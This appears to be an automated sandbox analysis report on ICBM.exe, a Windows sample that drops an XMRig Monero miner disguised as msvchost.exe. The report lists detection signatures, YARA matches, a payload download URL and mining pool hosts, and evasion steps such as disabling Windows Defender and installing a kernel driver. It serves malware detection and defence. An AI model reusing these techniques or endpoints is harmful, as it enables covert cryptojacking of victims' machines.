Windows Analysis Report
ICBM.exe

Overview

General Information

Sample name: ICBM.exe
Analysis ID: 1546578
MD5: 3dfd4a0c8e6c5568c338777ccc6fc37e
SHA1: 58ad52f683e605c371fbe493b077b4c3ebbe24e2
SHA256: 8c7c91623a101b7607bf30acb8f6794411f366c538ba807687aaefba831754f4
Infos:

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
DNS related to crypt mining pools
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops executables to the windows directory (C:\Windows) and starts them
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Process Parents
Tries to download files via bitsadmin
Abnormal high CPU Usage
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

barindex
Source: C:\Windows\System32\msvchost.exe Avira: detection malicious, Label: HEUR/AGEN.1311679
Source: C:\Windows\System32\msvchost.exe ReversingLabs: Detection: 70%
Source: C:\Windows\System32\msvchost.exe Joe Sandbox ML: detected

Bitcoin Miner

barindex
Source: Yara match File source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.27215515400.00007FF6F3AA0000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.28219496531.0000025943F8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ICBM.exe PID: 8064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msvchost.exe PID: 5828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5176, type: MEMORYSTR
Source: Yara match File source: C:\Windows\System32\msvchost.exe, type: DROPPED
Source: unknown DNS query: name: xmr-eu2.nanopool.org
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: XMRig 6.22.1
Source: unknown HTTPS traffic detected: 104.26.9.242:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: ICBM.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: ICBM.pdb source: ICBM.exe
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ICBM.exe, WinRing0x64.sys.3.dr
Source: global traffic TCP traffic: 192.168.11.20:49750 -> 51.15.89.13:14433
Source: Joe Sandbox View IP Address: 51.15.89.13 51.15.89.13
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 01 Nov 2024 05:02:54 GMTUser-Agent: Microsoft BITS/7.8Host: dl.imgdrop.io
Source: global traffic DNS traffic detected: DNS query: dl.imgdrop.io
Source: global traffic DNS traffic detected: DNS query: xmr-eu2.nanopool.org
Source: msvchost.exe, 0000000D.00000002.28219496531.000002594406B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: msvchost.exe, 0000000D.00000002.28219496531.000002594405E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: msvchost.exe, 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.cloudflare.com/origin_ca.crlH
Source: svchost.exe, 0000000A.00000002.28219427190.0000020A80502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ICBM.exe, WinRing0x64.sys.3.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ICBM.exe, WinRing0x64.sys.3.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ICBM.exe, WinRing0x64.sys.3.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ICBM.exe, WinRing0x64.sys.3.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000000A.00000002.28219427190.0000020A80502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000A.00000002.28219427190.0000020A80502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: edb.log.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
Source: ICBM.exe String found in binary or memory: http://ns.adobe.assertion
Source: msvchost.exe, 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: msvchost.exe, 0000000D.00000002.28219496531.000002594405E000.00000004.00000020.00020000.00000000.sdmp, msvchost.exe, 0000000D.00000002.28219496531.000002594406B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: qmgr.db.10.dr String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: qmgr.db.10.dr String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: qmgr.db.10.dr String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
Source: qmgr.db.10.dr String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
Source: qmgr.db.10.dr String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
Source: qmgr.db.10.dr String found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
Source: qmgr.db.10.dr String found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
Source: qmgr.db.10.dr String found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
Source: svchost.exe, 0000000A.00000002.28219427190.0000020A80502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28219350002.0000020A80499000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: svchost.exe, 0000000A.00000002.28221349946.0000020AFE6E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl.imgdrop.io/
Source: ICBM.exe, 00000003.00000002.28217615109.000001CCEC498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2
Source: svchost.exe, 0000000A.00000002.28221817196.0000020AFF102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28222069094.0000020AFFC60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28220347570.0000020A887D0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.27100468495.0000020A88664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28220772225.0000020AFE641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28219427190.0000020A804D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.27048276958.0000020A88661000.00000004.00000800.00020000.00000000.sdmp, ICBM.exe, service_log.txt.0.dr, edb.log.10.dr String found in binary or memory: https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724
Source: ICBM.exe String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: edb.log.10.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: ICBM.exe String found in binary or memory: https://github.com/clap-rs/clap/issues
Source: ICBM.exe String found in binary or memory: https://github.com/clap-rs/clap/issues-
Source: ICBM.exe String found in binary or memory: https://github.com/clap-rs/clap/issuesC:
Source: ICBM.exe String found in binary or memory: https://github.com/clap-rs/clap/issuesjA
Source: qmgr.db.10.dr String found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
Source: svchost.exe, 0000000A.00000002.28219427190.0000020A80502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28219350002.0000020A80499000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp, msvchost.exe, 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp, msvchost.exe, 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: msvchost.exe, 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown HTTPS traffic detected: 104.26.9.242:443 -> 192.168.11.20:49748 version: TLS 1.2

System Summary

barindex
Source: ICBM.exe, type: SAMPLE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.0.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.0.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.2.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.0.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.2.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.0.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: ICBM.exe PID: 8064, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: msvchost.exe PID: 5828, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\System32\msvchost.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\System32\msvchost.exe Process Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EC3C00 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetConsoleMode,GetFileType,GetFileInformationByHandleEx,memmove, 0_2_00007FF6D2EC3C00
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EC3AE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 0_2_00007FF6D2EC3AE0
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\WinRing0x64.sys Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\msvchost.exe Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe File created: C:\Windows\System32\WinRing0x64.sys Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\BITA85D.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_52g4imp4.qvm.ps1 Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EC3C00 0_2_00007FF6D2EC3C00
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DF4400 0_2_00007FF6D2DF4400
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D35410 0_2_00007FF6D2D35410
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D52510 0_2_00007FF6D2D52510
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE14F0 0_2_00007FF6D2EE14F0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E154D0 0_2_00007FF6D2E154D0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE0220 0_2_00007FF6D2EE0220
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D4D210 0_2_00007FF6D2D4D210
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E101F0 0_2_00007FF6D2E101F0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E001A0 0_2_00007FF6D2E001A0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D34190 0_2_00007FF6D2D34190
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2ECE160 0_2_00007FF6D2ECE160
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D5B320 0_2_00007FF6D2D5B320
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DF5290 0_2_00007FF6D2DF5290
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D6E7E0 0_2_00007FF6D2D6E7E0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE5760 0_2_00007FF6D2EE5760
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE08E0 0_2_00007FF6D2EE08E0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE4870 0_2_00007FF6D2EE4870
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E36620 0_2_00007FF6D2E36620
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DDE600 0_2_00007FF6D2DDE600
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D50610 0_2_00007FF6D2D50610
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DDF5C0 0_2_00007FF6D2DDF5C0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE6560 0_2_00007FF6D2EE6560
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D756E0 0_2_00007FF6D2D756E0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D4F6A6 0_2_00007FF6D2D4F6A6
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E226A0 0_2_00007FF6D2E226A0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EBE660 0_2_00007FF6D2EBE660
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EBBC20 0_2_00007FF6D2EBBC20
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DA1BC0 0_2_00007FF6D2DA1BC0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DC3B90 0_2_00007FF6D2DC3B90
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D38CF0 0_2_00007FF6D2D38CF0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DEBCC0 0_2_00007FF6D2DEBCC0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D31C90 0_2_00007FF6D2D31C90
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D96C60 0_2_00007FF6D2D96C60
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DF89D0 0_2_00007FF6D2DF89D0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DA5990 0_2_00007FF6D2DA5990
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D5B955 0_2_00007FF6D2D5B955
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DE5B20 0_2_00007FF6D2DE5B20
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D68B20 0_2_00007FF6D2D68B20
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D5BB2B 0_2_00007FF6D2D5BB2B
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2E0FB20 0_2_00007FF6D2E0FB20
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D69AE0 0_2_00007FF6D2D69AE0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DAE020 0_2_00007FF6D2DAE020
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DFE030 0_2_00007FF6D2DFE030
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE8010 0_2_00007FF6D2EE8010
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EEBFD0 0_2_00007FF6D2EEBFD0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D96F90 0_2_00007FF6D2D96F90
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D61F60 0_2_00007FF6D2D61F60
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D49110 0_2_00007FF6D2D49110
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D970F0 0_2_00007FF6D2D970F0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D96E00 0_2_00007FF6D2D96E00
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EB0DE0 0_2_00007FF6D2EB0DE0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DCBD90 0_2_00007FF6D2DCBD90
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE6D60 0_2_00007FF6D2EE6D60
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2D32F10 0_2_00007FF6D2D32F10
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EDBEF0 0_2_00007FF6D2EDBEF0
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2DE4E70 0_2_00007FF6D2DE4E70
Source: Joe Sandbox View Dropped File: C:\Windows\System32\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: Joe Sandbox View Dropped File: C:\Windows\System32\msvchost.exe B58481853CF26DCCDE549D444CED515F9335415C3BD7FF63ABBD49906EBE4B78
Source: C:\Users\user\Desktop\ICBM.exe Process token adjusted: Load Driver Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process token adjusted: Security Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Code function: String function: 00007FF6D2D36EE0 appears 43 times
Source: C:\Users\user\Desktop\ICBM.exe Code function: String function: 00007FF6D2EEC7A0 appears 32 times
Source: ICBM.exe, 00000000.00000002.26967278435.00007FF6D2EED000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWinRing0.sys2 vs ICBM.exe
Source: ICBM.exe, 00000000.00000000.26962987939.00007FF6D2EED000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWinRing0.sys2 vs ICBM.exe
Source: ICBM.exe, 00000003.00000002.28218615148.00007FF6D2EED000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWinRing0.sys2 vs ICBM.exe
Source: ICBM.exe, 00000003.00000003.27101972349.000001CCF878A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamexmrig.exe, vs ICBM.exe
Source: ICBM.exe, 00000003.00000000.26965606549.00007FF6D2EED000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWinRing0.sys2 vs ICBM.exe
Source: ICBM.exe Binary or memory string: OriginalFilenameWinRing0.sys2 vs ICBM.exe
Source: ICBM.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.0.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.0.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.2.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.ICBM.exe.7ff6d2ef8adb.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.0.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.2.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.0.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.ICBM.exe.7ff6d2d30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.0.msvchost.exe.7ff6f31f0000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000000.27214975187.00007FF6F3617000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
